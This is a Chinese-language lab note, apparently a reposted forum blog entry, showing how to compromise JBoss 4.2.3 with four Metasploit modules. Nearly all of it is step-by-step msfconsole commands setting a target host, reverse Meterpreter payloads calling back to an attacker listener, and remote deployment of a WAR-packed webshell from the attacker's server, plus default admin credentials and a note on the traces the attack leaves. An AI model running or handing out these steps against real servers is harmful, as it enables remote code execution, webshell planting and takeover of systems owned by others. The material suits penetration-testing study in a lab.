MSF中Jboss模块直接利用

  • 2019 年 11 月 20 日
  • 筆記

MSF中Jboss模块直接利用

实验环境:

Kali linux 2018

Windows server 2008 x64

JBOSS 4.2.3

安全检测过程:

在MSF中本身自带一些针对JBOSS漏洞的攻击模块,本次测试使用的JBOSS版本为4.2.3。

利用JMXInvokerServlet接口:

1 msf5 > use exploit/multi/http/jboss_invoke_deploy

2 msf5 > set rhosts 192.168.174.129

3 msf5 > set rport 8080

4 msf5 > set targeturi /invoker/JMXInvokerServlet (指定 JMXInvokerServlet 接口路径)

5 msf5 > set target 1

6 msf5 > set payload java/meterpreter/reverse_http 这里直接用JAVA payload

7 msf5 > set lhost 192.168.174.130

8 msf5 > set lport 110

9 msf5 > exploit

利用deploymentfilerepository服务:

1 msf5 > use exploit/multi/http/jboss_deploymentfilerepository

2 msf5 > set rhosts 192.168.174.129

3 msf5 > set rport 8080

4 msf5 > set targeturi /jmx‐console

5 msf5 > set verb POST (这里可以指定不同的请求方法)

6 msf5 > set target 3

7 msf5 > set payloadjava/meterpreter/reverse_http

8 msf5 > set lhost 192.168.174.130

9 msf5 > set lport 110

10 msf5 > exploit

利用BeanShell脚本:

1 msf5 > use exploit/multi/http/jboss_bshdeployer

2 msf5 > set rhosts 192.168.174.129

3 msf5 > set rport 8080

4 msf5 > set verb POST (这里可以指定不同的请求方法)

5 msf5 > set target 3

6 msf5 > set payload java/meterpreter/reverse_http

7 msf5 > set lhost 192.168.174.130

8 msf5 > set lport 110

9 msf5 > exploit

利用maindeployer远程部署webshell:

1 msf5 > exploit/multi/http/jboss_maindeployer

2 msf5 > set rhosts 192.168.174.129

3 msf5 > set rport 8080

4 msf5 > set httppassword admin 如果页面加了基础认证,需要加上

5 msf5 > set httpusername admin 账号密码

6 msf5 > set srvhost 192.168.174.130 (这里是提供远程下载war包的webshell:把jsp的webshell打包成war,然后放在自己的服务器上,如何打包参考:

http://www.mianhuage.com/649.html)

7 msf5 > set target 3

8 msf5 > set payload java/meterpreter/reverse_http

9 msf5 > set lhost 192.168.174.130

10 msf5 > set lport 7777

11 msf5 > exploit

所留痕迹:

以上所使用的模块攻击成功后都会在JBOSS目录:

C:jbos.2.3.gaserverdefaulttemdeploy

留下记录

作者:暖痕 (文章转载请注明来自:IT同路人论坛)